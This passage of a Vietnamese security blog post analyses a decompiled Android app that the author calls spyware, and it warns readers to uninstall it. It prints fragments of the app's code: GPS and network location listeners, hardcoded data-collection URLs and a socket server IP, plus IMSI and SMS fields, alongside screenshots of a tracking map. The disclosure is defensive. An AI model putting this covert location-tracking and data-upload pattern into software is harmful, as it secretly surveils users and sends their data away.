this.locationManager.requestLocationUpdates("network", 0L, 0.0F, this.myListenterNetwork);
return;
UtilGame.GPS_SAT = false;
}
UtilGame.GPS_NETWORK = false;
}
public void removeGps()
{
try
{
if (this.locationManager == null)
return;
if (this.locationManager.isProviderEnabled("gps"))
this.locationManager.removeUpdates(this.myListenter);
if (this.locationManager.isProviderEnabled("network"))
{
this.locationManager.removeUpdates(this.myListenterNetwork);
return;
}
}
catch (Exception localException)
{
}
}
public void run()
{
startLocationUpdate();
}
private class MyLocationListener
implements LocationListener
{
private MyLocationListener()
{
}
private double round(double paramDouble, int paramInt)
{
double d1 = 1.0D;
int j;
int k;
for (int i = paramInt; ; i = j)
{
j = i - 1;
if (i <= 0)
{
double d2 = paramDouble * d1;
k = (int)d2;
if (d2 - k < 0.5D)
break;
return (k + 1) / d1;
}
d1 *= 10.0D;
}
return k / d1;
}
Còn rất nhiều, rất nhiều hàm nguy hiểm khác mà người dùng không hề hay biết. nhưng mình chỉ trích dẫn một vài đoạn như trên:
public class HttpData
{
public static int intervalTimes = 0;
public static final String prefixUrl = "http://bx1.vhc.vn/services/m/";
public static final String prefixUrlData = "http://px.vhc.vn/services/data/";
public static final String prefixUrlDataErp = "http://bx2.vhc.vn/services/data/";
public static final String prefixUrlDataX = "http://px.vhc.vn/services/datax/";
public static final String prefixUrlData()
{
if (UtilGame.modeEncrypt)
return "http://px.vhc.vn/services/datax/";
return "http://px.vhc.vn/services/data/";
}public class ConfigGame
{
private static ConfigGame _instance;
private String activeKey;
private int diffDegree = 3;
private String idclient = "3";
private String idsms;
private String imsi;
private boolean isBackground = false;
private int port = 9991;
private int reqInterval = 30000;
private int typeGame;
private String urkSocket = "210.245.81.205";
private String username = getActiveKey();
Mình xin dừng bài viết ở đây, mã nguồn mình dịch ngược được ở dưới để các bạn tham khảo. Nếu ai không may cài đăt phần mềm này thì hay xoá nó khỏi điện thoại của mình ngay lập tức. Chúc các bạn may mắn và an toàn với CEH.
Bản đồ theo dõi
Miền bắc
![[Hình: snapshot9_hoangcuongflp_1403627966.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vsXcyxaVH1sdNSLb3UvDSXDP9NsaOao7DboZi4kJdmrpdVQ9jaGCUA6zP_idMxBy-luvrP1sc9Qw4uW103YjjgE6AIQ_AGxsIwrcekjZfbLQ4tuR16OMb0mcqLbqYxDNKyEhjQ68DQ9Jeb79cuhBup=s0-d)
![[Hình: snapshot9_hoangcuongflp_1403627966.png]](http://ceh.vn/@4rum/uploads/postimages/snapshot9_hoangcuongflp_1403627966.png)
Miền nam
![[Hình: snapshot10_hoangcuongflp_1403627998.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXE9GhCXwz7xEKR9pbjZKTLIFspngPW2gwsGBTrmcwV2hrGWMLKram3wXdMLkgOEoLLEggcegOq-Y_clwtXOO3IThGeiBpJxlXd5d-d8x_Me8Mo5PT11eL0E_4eiZj24Dn3fAU-ZqLMlUCVl8Wb7p12A=s0-d)
![[Hình: snapshot10_hoangcuongflp_1403627998.png]](http://ceh.vn/@4rum/uploads/postimages/snapshot10_hoangcuongflp_1403627998.png)
thậm chí…. thủ đô Bangkok – Thailand. @@”
Theo Hoangcuong's blog
Post a Comment